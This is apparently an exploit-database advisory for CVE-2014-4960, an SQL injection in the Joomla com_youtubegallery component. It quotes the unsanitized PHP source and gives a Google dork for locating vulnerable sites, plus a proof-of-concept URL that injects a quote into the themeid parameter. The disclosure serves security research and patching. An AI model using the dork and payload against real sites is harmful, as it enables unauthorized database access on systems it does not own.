扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 |
# Exploit Title: Joomla component com_youtubegallery - SQL Injection vulnerability # Google Dork: inurl:index.php?option=com_youtubegallery # Date: 15-07-2014 # Exploit Author: Pham Van Khanh (phamvankhanhbka@gmail.com) # Vendor Homepage: http://www.joomlaboat.com/youtube-gallery # Software Link: http://www.joomlaboat.com/youtube-gallery # Version: 4.x ( 3.x maybe) # Tested on: newest version 4.1.7 on Joomla 1.5, 2.5, 3 # CVE : CVE-2014-4960 Detail: In line: 40, file: components\com_youtubegallery\models\gallery.php, if parameter listid is int (or can cast to int), $listid and $themeid will not santinized. Source code: 40: if(JRequest::getInt('listid')) 41: { 42://Shadow Box 43:$listid=JRequest::getVar('listid'); 44: 45: 46://Get Theme 47: $m_themeid=(int)JRequest::getVar('mobilethemeid'); 48: if($m_themeid!=0) 49: { 50:if(YouTubeGalleryMisc::check_user_agent('mobile')) 51:$themeid=$m_themeid; 52:else 53:$themeid=JRequest::getVar('themeid'); 54:} 55:else 56: $themeid=JRequest::getVar('themeid'); 57: } After, $themeid and $listid are used in line 86, 92. Two method getVideoListTableRow and getThemeTableRow concat string to construct sql query. So it is vulnerable to SQL Injection. Source code: 86: if(!$this->misc->getVideoListTableRow($listid)) 87: { 88: echo '<p>No video found</p>'; 89: return false; 90: } 91: 92: if(!$this->misc->getThemeTableRow($themeid)) 93: { 94:echo '<p>No video found</p>'; 95:return false; 96: } # Site POF: http://server/index.php?option=com_youtubegallery&view=youtubegallery&listid=1&themeid=1'&videoid=ETMVUuFbToQ&tmpl=component&TB_iframe=true&height=500&width=700 |
体验盒子
